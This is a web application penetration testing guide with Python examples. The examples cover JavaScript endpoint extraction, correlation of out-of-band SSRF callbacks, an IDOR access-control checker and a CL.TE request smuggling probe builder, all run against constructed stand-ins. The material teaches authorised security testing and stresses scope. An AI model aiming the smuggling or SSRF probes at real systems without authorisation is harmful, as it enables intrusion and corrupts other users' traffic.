Web Application Penetration Test
A systematic approach to testing web applications for security vulnerabilities. Covers reconnaissance, mapping, vulnerability discovery, exploitation, and reporting.
Scope and Reconnaissance
Understand what you're testing. Get the target URLs, any credentials provided, and the rules of engagement, and confirm which hosts are in scope before you touch them: a subdomain you discover is not automatically fair game. Start with passive recon (certificate transparency logs, archived URLs, public code and documentation), then move to low-noise active recon: probe for live web servers, fingerprint the technology stack, pull the JavaScript files and the API endpoints referenced in them, and check for publicly exposed sensitive files such as .git directories, backups, and environment files.
Tip: httpx quickly probes discovered subdomains to find live web servers. Katana crawls the application to map its endpoints. waybackurls and gau pull historical URLs from archives; many are stale, but some still resolve to forgotten functionality. WhatWeb fingerprints the technology stack. Save every tool's output to a file, because you will want to diff it against later runs.
Mapping and Discovery
Map the application's attack surface. Brute-force directories and files, identify all input points (forms, URL parameters, headers, cookies), find API endpoints, and understand the authentication mechanism. The goal is to have a complete picture of every way you can interact with the application.
Tip: Feroxbuster and ffuf are fast directory brute-forcers; pick a wordlist that matches the stack you fingerprinted and throttle the rate if the target is production. Arjun discovers hidden HTTP parameters. ParamSpider mines archived URLs for parameters. LinkFinder extracts endpoints from JavaScript files, which often reveals API routes the UI never calls.
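To make the JavaScript step concrete, here is an added example (my code, not LinkFinder's and not part of this page's tooling) that pulls endpoint candidates out of a constructed minified bundle with a LinkFinder-style regex, resolves root-relative paths against an assumed base host (app.example.test), and flags the paths a tester would look at first. The sample bundle, the host, and the keyword list are all assumptions.

```python
import re
from urllib.parse import urljoin

# Constructed sample of a minified front-end bundle; not taken from any real site.
SAMPLE_JS = r"""
const API="/api/v2";fetch(API+"/users/me",{credentials:"include"});
axios.post("/api/v2/admin/export",{format:"csv"});
const ws=new WebSocket("wss://app.example.test/realtime");
import("/static/chunks/settings.js");
$.get('/internal/debug/config?verbose=1');
// legacy: https://legacy.example.test/v1/accounts  (unquoted, so not matched below)
"""

# LinkFinder-style pattern: a quoted absolute URL, root-relative path, or
# relative path with a telling extension. Quotes are required on both sides.
ENDPOINT_RE = re.compile(
    r"""["'](
          (?:[a-zA-Z]{1,10}://|//)[^"'/]+\.[a-zA-Z]{2,}[^"']*          # scheme://host/path
        | /[a-zA-Z0-9_./?=&%+-]+                                       # /root/relative?q=1
        | [a-zA-Z0-9_./-]+\.(?:js|php|aspx?|json|action|html)(?:\?[^"']*)?  # file.ext
    )["']""",
    re.VERBOSE,
)

# Keywords worth a first manual look once the list is extracted (assumption).
INTERESTING = ("admin", "internal", "debug", "export", "config")


def extract_endpoints(js: str, base: str = "https://app.example.test") -> list:
    """Return a sorted, de-duplicated list of absolute URLs referenced in js.

    Root-relative paths are resolved against base (an assumed host); absolute
    URLs with another scheme (wss://, https://other-host) are kept as found.
    Paths built by string concatenation (API + "/users/me") come out as
    fragments; reassembling those is still a job for whoever reads the bundle.
    """
    found = set()
    for m in ENDPOINT_RE.finditer(js):
        raw = m.group(1)
        if raw.startswith("//"):
            raw = "https:" + raw          # protocol-relative URL
        found.add(urljoin(base, raw))
    return sorted(found)


def flag_interesting(urls) -> list:
    """Subset of urls whose path contains a keyword from INTERESTING."""
    return [u for u in urls if any(k in u.lower() for k in INTERESTING)]


if __name__ == "__main__":
    urls = extract_endpoints(SAMPLE_JS)
    print("\n".join(urls))
    print("look here first:", flag_interesting(urls))
```

The unquoted URL in the comment is deliberately missed: regex extraction only sees string literals, so grep the bundle separately for bare hostnames, and expect fragments from concatenated paths that you reassemble by hand.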
Automated Vulnerability Scanning
Run automated scanners to catch the low-hanging fruit. Template-based scanners like Nuclei check for thousands of known vulnerabilities, misconfigurations, and exposed sensitive files. Combine this with specialized scanners for specific vulnerability classes, and treat every scanner hit as a lead to verify by hand, not as a finding.
Tip: Nuclei with the default template library catches an enormous amount; update the templates and run it first. Pair it with Interactsh so blind, out-of-band vulnerabilities such as SSRF and Log4Shell are detected through DNS or HTTP callbacks instead of being missed because nothing shows in the response. Run WPScan if the target is WordPress, and Nikto for general web server checks.
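The out-of-band workflow only pays off if every callback can be traced to the request that caused it, which also matters for the blind SSRF testing later on this page. The following added example (my code, not Nuclei's or Interactsh's) registers one unique subdomain token per injection point, then correlates a constructed interaction log back to those points and separates a confirmed HTTP fetch from a DNS-only resolution. The log line format is invented for the example (real Interactsh output differs), and the domain oob.example.test and the endpoints are assumptions.

```python
import re
import secrets
from dataclasses import dataclass

OOB_DOMAIN = "oob.example.test"   # assumption: a domain whose DNS/HTTP you observe


@dataclass(frozen=True)
class InjectionPoint:
    method: str
    url: str
    param: str


def plan_payloads(points, token_fn=secrets.token_hex):
    """Assign each injection point its own random subdomain token.

    Returns (registry, payloads): registry maps token -> point so a callback can
    be traced to exactly one request; payloads maps point -> URL to inject.
    """
    registry, payloads = {}, {}
    for p in points:
        token = token_fn(8)                 # 16 hex chars, well inside a DNS label
        registry[token] = p
        payloads[p] = f"http://{token}.{OOB_DOMAIN}/probe"
    return registry, payloads


# Constructed interaction log. The format is invented for this example; it is
# not Interactsh's real output, which you would parse instead.
INTERACTION_LOG = """\
2024-05-02T10:14:03Z dns   a1b2c3d4e5f60718.oob.example.test  from 198.51.100.23
2024-05-02T10:14:03Z http  a1b2c3d4e5f60718.oob.example.test  from 198.51.100.23 GET /probe
2024-05-02T10:15:40Z dns   ffffffffffffffff.oob.example.test  from 203.0.113.9
2024-05-02T10:16:01Z dns   deadbeefdeadbeef.oob.example.test  from 198.51.100.23
"""

LOG_RE = re.compile(
    r"^(\S+)\s+(dns|http)\s+([0-9a-f]{16})\." + re.escape(OOB_DOMAIN) + r"\s+from\s+(\S+)"
)


def correlate(registry, log_text):
    """Group interactions by token and map them back to injection points.

    Returns a list of (point, verdict, sorted source IPs). Tokens we never
    issued are dropped: they are noise, a typo, or someone else's scan.
    """
    seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, proto, token, src = m.groups()
        entry = seen.setdefault(token, {"protocols": set(), "sources": set()})
        entry["protocols"].add(proto)
        entry["sources"].add(src)

    findings = []
    for token, entry in seen.items():
        point = registry.get(token)
        if point is None:
            continue
        if "http" in entry["protocols"]:
            verdict = "confirmed: server fetched our URL (blind SSRF candidate)"
        else:
            # Hostname resolved but never fetched: egress is filtered, or a
            # scanner, mail gateway or link preview merely looked it up.
            verdict = "dns only: resolved, not fetched; verify before reporting"
        findings.append((point, verdict, sorted(entry["sources"])))
    return findings


def demo_registry():
    """Fixed tokens so the demo matches INTERACTION_LOG; real runs use secrets."""
    points = [
        InjectionPoint("POST", "https://app.example.test/api/import", "url"),
        InjectionPoint("GET", "https://app.example.test/avatar", "src"),
        InjectionPoint("POST", "https://app.example.test/webhooks", "callback"),
    ]
    fixed = iter(["a1b2c3d4e5f60718", "deadbeefdeadbeef", "0123456789abcdef"])
    return plan_payloads(points, token_fn=lambda _n: next(fixed))


if __name__ == "__main__":
    registry, payloads = demo_registry()
    for point, url in payloads.items():
        print(f"{point.method} {point.url} param={point.param} -> {url}")
    for point, verdict, sources in correlate(registry, INTERACTION_LOG):
        print(f"{point.param}@{point.url}: {verdict} (from {', '.join(sources)})")
```

Keep the registry with your evidence: the token in the callback is what ties the interaction to a specific request, and the source IP tells you whether the target itself or some third-party fetcher made the call.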
Manual Testing
This is where the real work happens. Use a web proxy to intercept and modify requests. Test every input point for injection vulnerabilities (SQL, XSS, OS command injection, server-side template injection). Check authentication and session management. Look for access control flaws: can you read or modify other users' data, and can you escalate privileges? Test file upload functionality, API authorization, and business logic.
Tip: Burp Suite is the backbone of manual web testing - learn it well. sqlmap automates SQL injection detection and exploitation. XSStrike and DalFox find reflected and DOM XSS. Commix handles OS command injection. Always test manually too: automated tools miss logic flaws and access control bugs, because they do not know what each user is supposed to be allowed to do.
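Access control testing is a differential exercise: request the same resource as its owner, as another authenticated user, and anonymously, then compare. This added example (my code, not from any tool on this page) implements that comparison against a constructed in-memory stand-in for a target with one IDOR endpoint and one endpoint that denies correctly but with a 200 status; in practice you would pass a fetch function built on a real HTTP client and the sessions you captured in Burp. All users, routes and data are assumptions.

```python
import json

# Constructed in-memory stand-in for the target application. Nothing here is a
# real site; it exists so the checker below runs offline.
SESSIONS = {"sess_alice": "alice", "sess_bob": "bob"}
ORDERS = {101: {"owner": "alice", "total": 42.0}, 102: {"owner": "bob", "total": 9.5}}
PROFILES = {"alice": {"email": "alice@example.test"}, "bob": {"email": "bob@example.test"}}


def fake_fetch(session, url):
    """Simulate GET url with a session cookie; return (status, body).

    /api/orders/<id>   has an intentional IDOR: no ownership check.
    /api/profiles/<u>  denies correctly, but with a 200 and an error body.
    """
    user = SESSIONS.get(session)
    if user is None:
        return 401, json.dumps({"error": "unauthenticated"})
    if url.startswith("/api/orders/"):
        order = ORDERS.get(int(url.rsplit("/", 1)[1]))
        if order is None:
            return 404, json.dumps({"error": "not found"})
        return 200, json.dumps(order)            # BUG: should require order["owner"] == user
    if url.startswith("/api/profiles/"):
        name = url.rsplit("/", 1)[1]
        if name != user:
            return 200, json.dumps({"error": "forbidden"})   # soft deny
        return 200, json.dumps(PROFILES[name])
    return 404, json.dumps({"error": "no route"})


def check_horizontal_access(fetch, resources, owner_session, other_session):
    """Differential access-control test.

    For every resource the owner can read, fetch it as another authenticated
    user and anonymously. A 200 with a byte-identical body is broken access
    control; a 200 with a different body needs a human look, because many
    applications answer "forbidden" with a 200 and hide the denial in the body.
    """
    findings = []
    for url in resources:
        base_status, base_body = fetch(owner_session, url)
        if base_status != 200:
            findings.append((url, "owner", f"baseline failed with {base_status}; fix the setup first"))
            continue
        for label, sess in (("other-user", other_session), ("anonymous", None)):
            status, body = fetch(sess, url)
            if status == 200 and body == base_body:
                findings.append((url, label, "same body as owner: broken access control"))
            elif status == 200:
                findings.append((url, label, "200 but different body: inspect manually"))
    return findings


if __name__ == "__main__":
    alice_resources = ["/api/orders/101", "/api/profiles/alice"]
    for f in check_horizontal_access(fake_fetch, alice_resources, "sess_alice", "sess_bob"):
        print(f)
```

Build the resource list from the owner's own browsing session (every ID the proxy saw), and repeat the exercise for write operations, where the comparison is the state change rather than the response body.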
Testing for Advanced Vulnerabilities
Go beyond the checks every scanner runs. Test for HTTP request smuggling, CRLF injection, CORS misconfiguration, server-side request forgery (SSRF), and web cache poisoning. Automated scanners often miss these, but they can be critical, and some of them (smuggling, cache poisoning) affect other users of the application, so confirm them with non-destructive probes.
Tip: Smuggler tests for CL.TE and TE.CL desync vulnerabilities; smuggling probes can corrupt other users' connections through a shared front end, so stick to detection-only probes on production and reproduce on a staging host if one is in scope. CRLFuzz scans for response splitting. Use Interactsh callback URLs when testing for blind SSRF: if the server makes an outbound request to your URL, you've found it, whereas a DNS lookup with no HTTP hit usually means egress is filtered or something merely resolved the hostname.
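For CL.TE request smuggling the bug is that the front end and the back end disagree about where a request ends. The added example below (my code, not Smuggler's) builds the classic CL.TE request, parses it once by Content-Length and once by chunked encoding, and shows the smuggled prefix the back end prepends to the next request on the connection. Host names are assumptions. Sending this against a live target is the exploitation step, not detection: it lands on whoever sends the next request over that back-end connection.

```python
def build_cl_te_probe(smuggled: bytes, host: bytes = b"app.example.test") -> bytes:
    """Classic CL.TE request: Content-Length covers the whole body, including
    the zero-length chunk and the smuggled bytes after it."""
    body = b"0\r\n\r\n" + smuggled
    return (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n" + body
    )


def parse_by_content_length(buf: bytes):
    """What a server that honours Content-Length sees: (body, leftover)."""
    head, _, rest = buf.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return rest[:length], rest[length:]


def parse_by_chunked(buf: bytes):
    """What a server that honours Transfer-Encoding: chunked sees: (body, leftover).
    Reads chunks until the zero-size one; trailers are not handled in this demo."""
    _head, _, rest = buf.partition(b"\r\n\r\n")
    body, pos = b"", 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            break
        body += rest[pos:pos + size]
        pos += size + 2                                # chunk data + its CRLF
    if rest[pos:pos + 2] != b"\r\n":
        raise ValueError("trailer section present; not handled here")
    return body, rest[pos + 2:]


def simulate_cl_te(probe: bytes, next_request: bytes):
    """Front end (CL) forwards the probe as one request; back end (TE) stops at
    the zero chunk and treats the rest as the start of the next request.
    Returns (front_end_leftover, back_end_leftover, first two lines the back end
    parses as the next request)."""
    _, fe_leftover = parse_by_content_length(probe)
    _, be_leftover = parse_by_chunked(probe)
    poisoned = be_leftover + next_request
    return fe_leftover, be_leftover, poisoned.split(b"\r\n")[:2]


if __name__ == "__main__":
    probe = build_cl_te_probe(b"GET /admin HTTP/1.1\r\nX: ")
    victim = b"GET /home HTTP/1.1\r\nHost: app.example.test\r\n\r\n"
    fe, be, lines = simulate_cl_te(probe, victim)
    print("front end left over:", fe)
    print("back end left over :", be)
    print("back end's next request starts:", lines)
```

The front end sees nothing left over, so it forwards everything as one request; the back end stops at the zero chunk and the victim's request line ends up inside a header of the attacker's smuggled GET /admin. TE.CL is the mirror image (the front end honours chunked encoding, the back end Content-Length), and the same two parsers show it if you swap which one you apply to which hop.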
Screenshot and Evidence Collection
As you find vulnerabilities, document everything. Take screenshots, save request/response pairs, and record the exact steps to reproduce each finding. For large target surfaces, use automated screenshot tools to capture the state of every endpoint.
Tip: Aquatone and EyeWitness generate browsable HTML reports from URL lists. Run these early for visual recon and again at the end to document your findings. Save Burp project files as evidence.